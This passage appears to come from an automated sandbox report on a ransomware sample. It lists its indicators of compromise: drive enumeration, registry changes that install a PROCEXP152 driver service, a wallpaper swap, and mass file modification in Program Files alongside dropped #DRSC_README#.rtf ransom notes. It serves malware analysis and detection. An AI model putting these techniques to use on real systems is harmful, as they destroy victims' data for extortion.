710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\K: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\B: V779npJ764.exe File opened (read-only) \??\J: V779npJ764.exe File opened (read-only) \??\M: V779npJ764.exe File opened (read-only) \??\X: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\E: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\E: V779npJ764.exe File opened (read-only) \??\S: V779npJ764.exe File opened (read-only) \??\Z: V779npJ764.exe File opened (read-only) \??\J: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\H: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\G: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\G: V779npJ764.exe File opened (read-only) \??\I: V779npJ764.exe File opened (read-only) \??\Y: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\S: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\Q: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\M: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\Q: V779npJ764.exe File opened (read-only) \??\T: V779npJ764.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 V779npJ764.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 V779npJ764.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" V779npJ764.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" V779npJ764.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" V779npJ764.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" V779npJ764.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\pd302Bf7.bmp" reg.exe -
Drops file in Program Files directory 3055 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\GrantSearch.easmx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\setup.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoBeta.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\uninstall\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana 